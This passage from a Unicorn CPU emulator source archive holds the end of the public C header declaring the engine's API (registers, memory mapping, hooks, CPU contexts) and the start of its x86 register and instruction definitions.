UC_CTL_WRITE(UC_CTL_UC_PAGE_SIZE, 1), (page_size)) #define uc_ctl_get_arch(uc, arch) \ uc_ctl(uc, UC_CTL_READ(UC_CTL_UC_ARCH, 1), (arch)) #define uc_ctl_get_timeout(uc, ptr) \ uc_ctl(uc, UC_CTL_READ(UC_CTL_UC_TIMEOUT, 1), (ptr)) #define uc_ctl_exits_enable(uc) \ uc_ctl(uc, UC_CTL_WRITE(UC_CTL_UC_USE_EXITS, 1), 1) #define uc_ctl_exits_disable(uc) \ uc_ctl(uc, UC_CTL_WRITE(UC_CTL_UC_USE_EXITS, 1), 0) #define uc_ctl_get_exits_cnt(uc, ptr) \ uc_ctl(uc, UC_CTL_READ(UC_CTL_UC_EXITS_CNT, 1), (ptr)) #define uc_ctl_get_exits(uc, buffer, len) \ uc_ctl(uc, UC_CTL_READ(UC_CTL_UC_EXITS, 2), (buffer), (len)) #define uc_ctl_set_exits(uc, buffer, len) \ uc_ctl(uc, UC_CTL_WRITE(UC_CTL_UC_EXITS, 2), (buffer), (len)) #define uc_ctl_get_cpu_model(uc, model) \ uc_ctl(uc, UC_CTL_READ(UC_CTL_CPU_MODEL, 1), (model)) #define uc_ctl_set_cpu_model(uc, model) \ uc_ctl(uc, UC_CTL_WRITE(UC_CTL_CPU_MODEL, 1), (model)) #define uc_ctl_remove_cache(uc, address, end) \ uc_ctl(uc, UC_CTL_WRITE(UC_CTL_TB_REMOVE_CACHE, 2), (address), (end)) #define uc_ctl_request_cache(uc, address, tb) \ uc_ctl(uc, UC_CTL_READ_WRITE(UC_CTL_TB_REQUEST_CACHE, 2), (address), (tb)) #define uc_ctl_flush_tb(uc) uc_ctl(uc, UC_CTL_WRITE(UC_CTL_TB_FLUSH, 0)) #define uc_ctl_flush_tlb(uc) uc_ctl(uc, UC_CTL_WRITE(UC_CTL_TLB_FLUSH, 0)) #define uc_ctl_tlb_mode(uc, mode) \ uc_ctl(uc, UC_CTL_WRITE(UC_CTL_TLB_TYPE, 1), (mode)) #define uc_ctl_get_tcg_buffer_size(uc, size) \ uc_ctl(uc, UC_CTL_READ(UC_CTL_TCG_BUFFER_SIZE, 1), (size)) #define uc_ctl_set_tcg_buffer_size(uc, size) \ uc_ctl(uc, UC_CTL_WRITE(UC_CTL_TCG_BUFFER_SIZE, 1), (size)) #define uc_ctl_context_mode(uc, mode) \ uc_ctl(uc, UC_CTL_WRITE(UC_CTL_CONTEXT_MODE, 1), (mode)) // Opaque storage for CPU context, used with uc_context_*() struct uc_context; typedef struct uc_context uc_context; /* Return combined API version & major and minor version numbers. @major: major number of API version @minor: minor number of API version @return hexadecimal number as (major << 24 | minor << 16 | patch << 8 | extra). NOTE: This returned value can be compared with version number made with macro UC_MAKE_VERSION For example, Unicorn version 2.0.1 final would be 0x020001ff. NOTE: if you only care about returned value, but not major and minor values, set both @major & @minor arguments to NULL. */ UNICORN_EXPORT unsigned int uc_version(unsigned int *major, unsigned int *minor); /* Determine if the given architecture is supported by this library. @arch: architecture type (UC_ARCH_*) @return True if this library supports the given arch. */ UNICORN_EXPORT bool uc_arch_supported(uc_arch arch); /* Create new instance of unicorn engine. @arch: architecture type (UC_ARCH_*) @mode: hardware mode. This is combined of UC_MODE_* @uc: pointer to uc_engine, which will be updated at return time @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **uc); /* Close a Unicorn engine instance. NOTE: this must be called only when there is no longer any usage of @uc. This API releases some of @uc's cached memory, thus any use of the Unicorn API with @uc after it has been closed may crash your application. After this, @uc is invalid, and is no longer usable. @uc: pointer to a handle returned by uc_open() @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_close(uc_engine *uc); /* Query internal status of engine. @uc: handle returned by uc_open() @type: query type. See uc_query_type @result: save the internal status queried @return: error code of uc_err enum type (UC_ERR_*, see above) */ UNICORN_EXPORT uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result); /* Control internal states of engine. Also see uc_ctl_* macro helpers for easy use. @uc: handle returned by uc_open() @control: the control type. @args: See uc_control_type for details about variadic arguments. @return: error code of uc_err enum type (UC_ERR_*, see above) */ UNICORN_EXPORT uc_err uc_ctl(uc_engine *uc, uc_control_type control, ...); /* Report the last error number when some API function fails. Like glibc's errno, uc_errno might not retain its old value once accessed. @uc: handle returned by uc_open() @return: error code of uc_err enum type (UC_ERR_*, see above) */ UNICORN_EXPORT uc_err uc_errno(uc_engine *uc); /* Return a string describing given error code. @code: error code (see UC_ERR_* above) @return: returns a pointer to a string that describes the error code passed in the argument @code */ UNICORN_EXPORT const char *uc_strerror(uc_err code); /* Write to register. @uc: handle returned by uc_open() @regid: register ID that is to be modified. @value: pointer to the value that will be written to register @regid @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is invalid */ UNICORN_EXPORT uc_err uc_reg_write(uc_engine *uc, int regid, const void *value); /* Read register value. @uc: handle returned by uc_open() @regid: register ID that is to be retrieved. @value: pointer to a variable storing the register value. @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is invalid */ UNICORN_EXPORT uc_err uc_reg_read(uc_engine *uc, int regid, void *value); /* Write to register. @uc: handle returned by uc_open() @regid: register ID that is to be modified. @value: pointer to the value that will be written to register @regid @size: size of value being written; on return, size of value written @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is invalid; UC_ERR_OVERFLOW if value is not large enough for the register. */ UNICORN_EXPORT uc_err uc_reg_write2(uc_engine *uc, int regid, const void *value, size_t *size); /* Read register value. @uc: handle returned by uc_open() @regid: register ID that is to be retrieved. @value: pointer to a variable storing the register value. @size: size of value buffer; on return, size of value read @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is invalid; UC_ERR_OVERFLOW if value is not large enough to hold the register. */ UNICORN_EXPORT uc_err uc_reg_read2(uc_engine *uc, int regid, void *value, size_t *size); /* Write multiple register values. @uc: handle returned by uc_open() @regs: array of register IDs to store @vals: array of pointers to register values @count: length of both *regs and *vals @return UC_ERR_OK on success; UC_ERR_ARG if some register number or value is invalid */ UNICORN_EXPORT uc_err uc_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count); /* Read multiple register values. @uc: handle returned by uc_open() @regs: array of register IDs to retrieve @vals: array of pointers to register values @count: length of both *regs and *vals @return UC_ERR_OK on success; UC_ERR_ARG if some register number or value is invalid */ UNICORN_EXPORT uc_err uc_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count); /* Write multiple register values. @uc: handle returned by uc_open() @regs: array of register IDs to store @value: array of pointers to register values @sizes: array of sizes of each value; on return, sizes of each stored register @count: length of *regs, *vals and *sizes @return UC_ERR_OK on success; UC_ERR_ARG if some register number or value is invalid; UC_ERR_OVERFLOW if some value is not large enough for the corresponding register. */ UNICORN_EXPORT uc_err uc_reg_write_batch2(uc_engine *uc, int *regs, const void *const *vals, size_t *sizes, int count); /* Read multiple register values. @uc: handle returned by uc_open() @regs: array of register IDs to retrieve @value: pointer to array of values to hold registers @sizes: array of sizes of each value; on return, sizes of each retrieved register @count: length of *regs, *vals and *sizes @return UC_ERR_OK on success; UC_ERR_ARG if some register number or value is invalid; UC_ERR_OVERFLOW if some value is not large enough to hold the corresponding register. */ UNICORN_EXPORT uc_err uc_reg_read_batch2(uc_engine *uc, int *regs, void *const *vals, size_t *sizes, int count); /* Write to a range of bytes in memory. @uc: handle returned by uc_open() @address: starting memory address of bytes to set. @bytes: pointer to a variable containing data to be written to memory. @size: size of memory to write to. NOTE: @bytes must be big enough to contain @size bytes. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size); /* Read a range of bytes in memory. @uc: handle returned by uc_open() @address: starting memory address of bytes to get. @bytes: pointer to a variable containing data copied from memory. @size: size of memory to read. NOTE: @bytes must be big enough to contain @size bytes. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size); /* Emulate machine code in a specific duration of time. @uc: handle returned by uc_open() @begin: address where emulation starts @until: address where emulation stops (i.e. when this address is hit) @timeout: duration to emulate the code (in microseconds). When this value is 0, we will emulate the code in infinite time, until the code is finished. @count: the number of instructions to be emulated. When this value is 0, we will emulate all the code available, until the code is finished. NOTE: The internal states of the engine is guranteed to be correct if and only if uc_emu_start returns without any errors or errors have been handled in the callbacks. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count); /* Stop emulation (which was started by uc_emu_start() API. This is typically called from callback functions registered via tracing APIs. @uc: handle returned by uc_open() @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_emu_stop(uc_engine *uc); /* Register callback for a hook event. The callback will be run when the hook event is hit. @uc: handle returned by uc_open() @hh: hook handle returned from this registration. To be used in uc_hook_del() API @type: hook type, refer to uc_hook_type enum @callback: callback to be run when instruction is hit @user_data: user-defined data. This will be passed to callback function in its last argument @user_data @begin: start address of the area where the callback is in effect (inclusive) @end: end address of the area where the callback is in effect (inclusive) NOTE 1: the callback is called only if related address is in range [@begin, @end] NOTE 2: if @begin > @end, callback is called whenever this hook type is triggered @...: variable arguments (depending on @type) NOTE: if @type = UC_HOOK_INSN, this is the instruction ID. currently, only x86 in, out, syscall, sysenter, cpuid are supported. NOTE: if @type = UC_HOOK_TCG_OPCODE, arguments are @opcode and @flags. See @uc_tcg_op_code and @uc_tcg_op_flag for details. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, ...); /* Unregister (remove) a hook callback. This API removes the hook callback registered by uc_hook_add(). NOTE: this should be called only when you no longer want to trace. After this, @hh is invalid, and no longer usable. @uc: handle returned by uc_open() @hh: handle returned by uc_hook_add() @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_hook_del(uc_engine *uc, uc_hook hh); typedef enum uc_prot { UC_PROT_NONE = 0, UC_PROT_READ = 1, UC_PROT_WRITE = 2, UC_PROT_EXEC = 4, UC_PROT_ALL = 7, } uc_prot; struct uc_tlb_entry { uint64_t paddr; uc_prot perms; }; typedef enum uc_context_content { UC_CTL_CONTEXT_CPU = 1, UC_CTL_CONTEXT_MEMORY = 2, } uc_context_content; /* Map memory in for emulation. This API adds a memory region that can be used by emulation. @uc: handle returned by uc_open() @address: starting address of the new memory region to be mapped in. This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. @size: size of the new memory region to be mapped in. This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error. @perms: Permissions for the newly mapped region. This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, or this will return with UC_ERR_ARG error. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); /* Map existing host memory in for emulation. This API adds a memory region that can be used by emulation. @uc: handle returned by uc_open() @address: starting address of the new memory region to be mapped in. This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. @size: size of the new memory region to be mapped in. This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error. @perms: Permissions for the newly mapped region. This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, or this will return with UC_ERR_ARG error. @ptr: pointer to host memory backing the newly mapped memory. This host memory is expected to be an equal or larger size than provided, and be mapped with at least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr); /* Map MMIO in for emulation. This API adds a MMIO region that can be used by emulation. @uc: handle returned by uc_open() @address: starting address of the new MMIO region to be mapped in. This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. @size: size of the new MMIO region to be mapped in. This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. @read_cb: function for handling reads from this MMIO region. @user_data_read: user-defined data. This will be passed to @read_cb function in its last argument @user_data @write_cb: function for handling writes to this MMIO region. @user_data_write: user-defined data. This will be passed to @write_cb function in its last argument @user_data @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_mmio_map(uc_engine *uc, uint64_t address, size_t size, uc_cb_mmio_read_t read_cb, void *user_data_read, uc_cb_mmio_write_t write_cb, void *user_data_write); /* Unmap a region of emulation memory. This API deletes a memory mapping from the emulation memory space. @uc: handle returned by uc_open() @address: starting address of the memory region to be unmapped. This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. @size: size of the memory region to be modified. This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_mem_unmap(uc_engine *uc, uint64_t address, size_t size); /* Set memory permissions for emulation memory. This API changes permissions on an existing memory region. @uc: handle returned by uc_open() @address: starting address of the memory region to be modified. This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. @size: size of the memory region to be modified. This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error. @perms: New permissions for the mapped region. This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, or this will return with UC_ERR_ARG error. @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); /* Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr() This API allocates memory for @regions, and user must free this memory later by uc_free() to avoid leaking memory. NOTE: memory regions may be split by uc_mem_unmap() @uc: handle returned by uc_open() @regions: pointer to an array of uc_mem_region struct. This is allocated by Unicorn, and must be freed by user later with uc_free() @count: pointer to number of struct uc_mem_region contained in @regions @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count); /* Allocate a region that can be used with uc_context_{save,restore} to perform quick save/rollback of the CPU context, which includes registers and some internal metadata. Contexts may not be shared across engine instances with differing arches or modes. @uc: handle returned by uc_open() @context: pointer to a uc_context*. This will be updated with the pointer to the new context on successful return of this function. Later, this allocated memory must be freed with uc_context_free(). @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_context_alloc(uc_engine *uc, uc_context **context); /* Free the memory allocated by uc_mem_regions. WARNING: After Unicorn 1.0.1rc5, the memory allocated by uc_context_alloc should be freed by uc_context_free(). Calling uc_free() may still work, but the result is **undefined**. @mem: memory allocated by uc_mem_regions (returned in *regions). @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_free(void *mem); /* Save a copy of the internal CPU context. This API should be used to efficiently make or update a saved copy of the internal CPU state. @uc: handle returned by uc_open() @context: handle returned by uc_context_alloc() @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_context_save(uc_engine *uc, uc_context *context); /* Write value to a register of a context. @ctx: handle returned by uc_context_alloc() @regid: register ID that is to be modified. @value: pointer to the value that will be written to register @regid @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is invalid */ UNICORN_EXPORT uc_err uc_context_reg_write(uc_context *ctx, int regid, const void *value); /* Read register value from a context. @ctx: handle returned by uc_context_alloc() @regid: register ID that is to be retrieved. @value: pointer to a variable storing the register value. @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is invalid */ UNICORN_EXPORT uc_err uc_context_reg_read(uc_context *ctx, int regid, void *value); /* Write value to a register of a context. @ctx: handle returned by uc_context_alloc() @regid: register ID that is to be modified. @value: pointer to the value that will be written to register @regid @size: size of value being written; on return, size of value written @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is invalid; UC_ERR_OVERFLOW if value is not large enough for the register. */ UNICORN_EXPORT uc_err uc_context_reg_write2(uc_context *ctx, int regid, const void *value, size_t *size); /* Read register value from a context. @ctx: handle returned by uc_context_alloc() @regid: register ID that is to be retrieved. @value: pointer to a variable storing the register value. @size: size of value buffer; on return, size of value read @return UC_ERR_OK on success; UC_ERR_ARG if register number or value is invalid; UC_ERR_OVERFLOW if value is not large enough to hold the register. */ UNICORN_EXPORT uc_err uc_context_reg_read2(uc_context *ctx, int regid, void *value, size_t *size); /* Write multiple register values to registers of a context. @ctx: handle returned by uc_context_alloc() @regs: array of register IDs to store @value: pointer to array of register values @count: length of both *regs and *vals @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_context_reg_write_batch(uc_context *ctx, int *regs, void *const *vals, int count); /* Read multiple register values from a context. @ctx: handle returned by uc_context_alloc() @regs: array of register IDs to retrieve @value: pointer to array of values to hold registers @count: length of both *regs and *vals @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_context_reg_read_batch(uc_context *ctx, int *regs, void **vals, int count); /* Write multiple register values to registers of a context. @ctx: handle returned by uc_context_alloc() @regs: array of register IDs to store @value: array of pointers to register values @sizes: array of sizes of each value; on return, sizes of each stored register @count: length of *regs, *vals and *sizes @return UC_ERR_OK on success; UC_ERR_ARG if some register number or value is invalid; UC_ERR_OVERFLOW if some value is not large enough for the corresponding register. */ UNICORN_EXPORT uc_err uc_context_reg_write_batch2(uc_context *ctx, int *regs, const void *const *vals, size_t *sizes, int count); /* Read multiple register values from a context. @ctx: handle returned by uc_context_alloc() @regs: array of register IDs to retrieve @value: pointer to array of values to hold registers @sizes: array of sizes of each value; on return, sizes of each retrieved register @count: length of *regs, *vals and *sizes @return UC_ERR_OK on success; UC_ERR_ARG if some register number or value is invalid; UC_ERR_OVERFLOW if some value is not large enough to hold the corresponding register. */ UNICORN_EXPORT uc_err uc_context_reg_read_batch2(uc_context *ctx, int *regs, void *const *vals, size_t *sizes, int count); /* Restore the current CPU context from a saved copy. This API should be used to roll the CPU context back to a previous state saved by uc_context_save(). @uc: handle returned by uc_open() @context: handle returned by uc_context_alloc that has been used with uc_context_save @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_context_restore(uc_engine *uc, uc_context *context); /* Return the size needed to store the cpu context. Can be used to allocate a buffer to contain the cpu context and directly call uc_context_save. @uc: handle returned by uc_open() @return the size for needed to store the cpu context as as size_t. */ UNICORN_EXPORT size_t uc_context_size(uc_engine *uc); /* Free the context allocated by uc_context_alloc(). @context: handle returned by uc_context_alloc() @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). */ UNICORN_EXPORT uc_err uc_context_free(uc_context *context); #ifdef __cplusplus } #endif #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/unicorn/x86.h�����������������������������������������������������������������0000664�0000000�0000000�00000116151�14675241067�0017107�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ /* This file is released under LGPL2. See COPYING.LGPL2 in root directory for more details */ #ifndef UNICORN_X86_H #define UNICORN_X86_H #ifdef __cplusplus extern "C" { #endif #include "platform.h" //> X86 CPU typedef enum uc_cpu_x86 { UC_CPU_X86_QEMU64 = 0, UC_CPU_X86_PHENOM, UC_CPU_X86_CORE2DUO, UC_CPU_X86_KVM64, UC_CPU_X86_QEMU32, UC_CPU_X86_KVM32, UC_CPU_X86_COREDUO, UC_CPU_X86_486, UC_CPU_X86_PENTIUM, UC_CPU_X86_PENTIUM2, UC_CPU_X86_PENTIUM3, UC_CPU_X86_ATHLON, UC_CPU_X86_N270, UC_CPU_X86_CONROE, UC_CPU_X86_PENRYN, UC_CPU_X86_NEHALEM, UC_CPU_X86_WESTMERE, UC_CPU_X86_SANDYBRIDGE, UC_CPU_X86_IVYBRIDGE, UC_CPU_X86_HASWELL, UC_CPU_X86_BROADWELL, UC_CPU_X86_SKYLAKE_CLIENT, UC_CPU_X86_SKYLAKE_SERVER, UC_CPU_X86_CASCADELAKE_SERVER, UC_CPU_X86_COOPERLAKE, UC_CPU_X86_ICELAKE_CLIENT, UC_CPU_X86_ICELAKE_SERVER, UC_CPU_X86_DENVERTON, UC_CPU_X86_SNOWRIDGE, UC_CPU_X86_KNIGHTSMILL, UC_CPU_X86_OPTERON_G1, UC_CPU_X86_OPTERON_G2, UC_CPU_X86_OPTERON_G3, UC_CPU_X86_OPTERON_G4, UC_CPU_X86_OPTERON_G5, UC_CPU_X86_EPYC, UC_CPU_X86_DHYANA, UC_CPU_X86_EPYC_ROME, UC_CPU_X86_ENDING } uc_cpu_x86; // Memory-Management Register for instructions IDTR, GDTR, LDTR, TR. // Borrow from SegmentCache in qemu/target-i386/cpu.h typedef struct uc_x86_mmr { uint16_t selector; /* not used by GDTR and IDTR */ uint64_t base; /* handle 32 or 64 bit CPUs */ uint32_t limit; uint32_t flags; /* not used by GDTR and IDTR */ } uc_x86_mmr; // Model-Specific Register structure, use this with UC_X86_REG_MSR (as the // register ID) in call to uc_reg_write/uc_reg_read() to manipulate MSRs. typedef struct uc_x86_msr { uint32_t rid; // MSR id uint64_t value; // MSR value } uc_x86_msr; // Callback function for tracing SYSCALL/SYSENTER (for uc_hook_intr()) // @user_data: user data passed to tracing APIs. typedef void (*uc_cb_insn_syscall_t)(struct uc_struct *uc, void *user_data); // Callback function for tracing cpuid (for uc_hook_intr()) // @user_data: user data passed to tracing APIs. // // @return: true indicates the callback overwrites the cpuid instruction while // false // indicates cpuid instruction will still be executed. typedef int (*uc_cb_insn_cpuid_t)(struct uc_struct *uc, void *user_data); //> X86 registers typedef enum uc_x86_reg { UC_X86_REG_INVALID = 0, UC_X86_REG_AH, UC_X86_REG_AL, UC_X86_REG_AX, UC_X86_REG_BH, UC_X86_REG_BL, UC_X86_REG_BP, UC_X86_REG_BPL, UC_X86_REG_BX, UC_X86_REG_CH, UC_X86_REG_CL, UC_X86_REG_CS, UC_X86_REG_CX, UC_X86_REG_DH, UC_X86_REG_DI, UC_X86_REG_DIL, UC_X86_REG_DL, UC_X86_REG_DS, UC_X86_REG_DX, UC_X86_REG_EAX, UC_X86_REG_EBP, UC_X86_REG_EBX, UC_X86_REG_ECX, UC_X86_REG_EDI, UC_X86_REG_EDX, UC_X86_REG_EFLAGS, UC_X86_REG_EIP, UC_X86_REG_ES = UC_X86_REG_EIP + 2, UC_X86_REG_ESI, UC_X86_REG_ESP, UC_X86_REG_FPSW, UC_X86_REG_FS, UC_X86_REG_GS, UC_X86_REG_IP, UC_X86_REG_RAX, UC_X86_REG_RBP, UC_X86_REG_RBX, UC_X86_REG_RCX, UC_X86_REG_RDI, UC_X86_REG_RDX, UC_X86_REG_RIP, UC_X86_REG_RSI = UC_X86_REG_RIP + 2, UC_X86_REG_RSP, UC_X86_REG_SI, UC_X86_REG_SIL, UC_X86_REG_SP, UC_X86_REG_SPL, UC_X86_REG_SS, UC_X86_REG_CR0, UC_X86_REG_CR1, UC_X86_REG_CR2, UC_X86_REG_CR3, UC_X86_REG_CR4, UC_X86_REG_CR8 = UC_X86_REG_CR4 + 4, UC_X86_REG_DR0 = UC_X86_REG_CR8 + 8, UC_X86_REG_DR1, UC_X86_REG_DR2, UC_X86_REG_DR3, UC_X86_REG_DR4, UC_X86_REG_DR5, UC_X86_REG_DR6, UC_X86_REG_DR7, UC_X86_REG_FP0 = UC_X86_REG_DR7 + 9, UC_X86_REG_FP1, UC_X86_REG_FP2, UC_X86_REG_FP3, UC_X86_REG_FP4, UC_X86_REG_FP5, UC_X86_REG_FP6, UC_X86_REG_FP7, UC_X86_REG_K0, UC_X86_REG_K1, UC_X86_REG_K2, UC_X86_REG_K3, UC_X86_REG_K4, UC_X86_REG_K5, UC_X86_REG_K6, UC_X86_REG_K7, UC_X86_REG_MM0, UC_X86_REG_MM1, UC_X86_REG_MM2, UC_X86_REG_MM3, UC_X86_REG_MM4, UC_X86_REG_MM5, UC_X86_REG_MM6, UC_X86_REG_MM7, UC_X86_REG_R8, UC_X86_REG_R9, UC_X86_REG_R10, UC_X86_REG_R11, UC_X86_REG_R12, UC_X86_REG_R13, UC_X86_REG_R14, UC_X86_REG_R15, UC_X86_REG_ST0, UC_X86_REG_ST1, UC_X86_REG_ST2, UC_X86_REG_ST3, UC_X86_REG_ST4, UC_X86_REG_ST5, UC_X86_REG_ST6, UC_X86_REG_ST7, UC_X86_REG_XMM0, UC_X86_REG_XMM1, UC_X86_REG_XMM2, UC_X86_REG_XMM3, UC_X86_REG_XMM4, UC_X86_REG_XMM5, UC_X86_REG_XMM6, UC_X86_REG_XMM7, UC_X86_REG_XMM8, UC_X86_REG_XMM9, UC_X86_REG_XMM10, UC_X86_REG_XMM11, UC_X86_REG_XMM12, UC_X86_REG_XMM13, UC_X86_REG_XMM14, UC_X86_REG_XMM15, UC_X86_REG_XMM16, UC_X86_REG_XMM17, UC_X86_REG_XMM18, UC_X86_REG_XMM19, UC_X86_REG_XMM20, UC_X86_REG_XMM21, UC_X86_REG_XMM22, UC_X86_REG_XMM23, UC_X86_REG_XMM24, UC_X86_REG_XMM25, UC_X86_REG_XMM26, UC_X86_REG_XMM27, UC_X86_REG_XMM28, UC_X86_REG_XMM29, UC_X86_REG_XMM30, UC_X86_REG_XMM31, UC_X86_REG_YMM0, UC_X86_REG_YMM1, UC_X86_REG_YMM2, UC_X86_REG_YMM3, UC_X86_REG_YMM4, UC_X86_REG_YMM5, UC_X86_REG_YMM6, UC_X86_REG_YMM7, UC_X86_REG_YMM8, UC_X86_REG_YMM9, UC_X86_REG_YMM10, UC_X86_REG_YMM11, UC_X86_REG_YMM12, UC_X86_REG_YMM13, UC_X86_REG_YMM14, UC_X86_REG_YMM15, UC_X86_REG_YMM16, UC_X86_REG_YMM17, UC_X86_REG_YMM18, UC_X86_REG_YMM19, UC_X86_REG_YMM20, UC_X86_REG_YMM21, UC_X86_REG_YMM22, UC_X86_REG_YMM23, UC_X86_REG_YMM24, UC_X86_REG_YMM25, UC_X86_REG_YMM26, UC_X86_REG_YMM27, UC_X86_REG_YMM28, UC_X86_REG_YMM29, UC_X86_REG_YMM30, UC_X86_REG_YMM31, UC_X86_REG_ZMM0, UC_X86_REG_ZMM1, UC_X86_REG_ZMM2, UC_X86_REG_ZMM3, UC_X86_REG_ZMM4, UC_X86_REG_ZMM5, UC_X86_REG_ZMM6, UC_X86_REG_ZMM7, UC_X86_REG_ZMM8, UC_X86_REG_ZMM9, UC_X86_REG_ZMM10, UC_X86_REG_ZMM11, UC_X86_REG_ZMM12, UC_X86_REG_ZMM13, UC_X86_REG_ZMM14, UC_X86_REG_ZMM15, UC_X86_REG_ZMM16, UC_X86_REG_ZMM17, UC_X86_REG_ZMM18, UC_X86_REG_ZMM19, UC_X86_REG_ZMM20, UC_X86_REG_ZMM21, UC_X86_REG_ZMM22, UC_X86_REG_ZMM23, UC_X86_REG_ZMM24, UC_X86_REG_ZMM25, UC_X86_REG_ZMM26, UC_X86_REG_ZMM27, UC_X86_REG_ZMM28, UC_X86_REG_ZMM29, UC_X86_REG_ZMM30, UC_X86_REG_ZMM31, UC_X86_REG_R8B, UC_X86_REG_R9B, UC_X86_REG_R10B, UC_X86_REG_R11B, UC_X86_REG_R12B, UC_X86_REG_R13B, UC_X86_REG_R14B, UC_X86_REG_R15B, UC_X86_REG_R8D, UC_X86_REG_R9D, UC_X86_REG_R10D, UC_X86_REG_R11D, UC_X86_REG_R12D, UC_X86_REG_R13D, UC_X86_REG_R14D, UC_X86_REG_R15D, UC_X86_REG_R8W, UC_X86_REG_R9W, UC_X86_REG_R10W, UC_X86_REG_R11W, UC_X86_REG_R12W, UC_X86_REG_R13W, UC_X86_REG_R14W, UC_X86_REG_R15W, UC_X86_REG_IDTR, UC_X86_REG_GDTR, UC_X86_REG_LDTR, UC_X86_REG_TR, UC_X86_REG_FPCW, UC_X86_REG_FPTAG, UC_X86_REG_MSR, // Model-Specific Register UC_X86_REG_MXCSR, UC_X86_REG_FS_BASE, // Base regs for x86_64 UC_X86_REG_GS_BASE, UC_X86_REG_FLAGS, UC_X86_REG_RFLAGS, UC_X86_REG_FIP, UC_X86_REG_FCS, UC_X86_REG_FDP, UC_X86_REG_FDS, UC_X86_REG_FOP, UC_X86_REG_ENDING // <-- mark the end of the list of registers } uc_x86_reg; //> X86 instructions typedef enum uc_x86_insn { UC_X86_INS_INVALID = 0, UC_X86_INS_AAA, UC_X86_INS_AAD, UC_X86_INS_AAM, UC_X86_INS_AAS, UC_X86_INS_FABS, UC_X86_INS_ADC, UC_X86_INS_ADCX, UC_X86_INS_ADD, UC_X86_INS_ADDPD, UC_X86_INS_ADDPS, UC_X86_INS_ADDSD, UC_X86_INS_ADDSS, UC_X86_INS_ADDSUBPD, UC_X86_INS_ADDSUBPS, UC_X86_INS_FADD, UC_X86_INS_FIADD, UC_X86_INS_FADDP, UC_X86_INS_ADOX, UC_X86_INS_AESDECLAST, UC_X86_INS_AESDEC, UC_X86_INS_AESENCLAST, UC_X86_INS_AESENC, 